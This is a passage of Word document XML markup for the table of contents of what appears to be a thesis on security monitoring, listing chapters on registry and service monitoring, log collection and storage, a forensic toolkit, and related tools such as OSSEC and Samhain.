            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303705" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2</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Thesis’ statement</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303705 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303706" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3</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Subject</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303706 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303707" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4</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Scope</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303707 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303708" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5</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The needs of Registry monitoring module</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303708 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303709" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.6</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The needs of Service monitoring module</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303709 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303710" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.7</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The needs of Distributed Log Collector Hardware</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303710 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303711" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.8</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The needs of Centralized Log Storage System</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303711 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303712" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.9</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The needs of Forensic Toolkit</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303712 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303713" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 2.</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BACKGROUND AND RELATED WORKS</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303713 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303714" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</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Related works</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303714 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303715" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.1</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OSSEC</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303715 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303716" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.2</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Samhain</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303716 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303717" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</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Background</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303717 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303718" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1</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Windows Registry</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303718 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
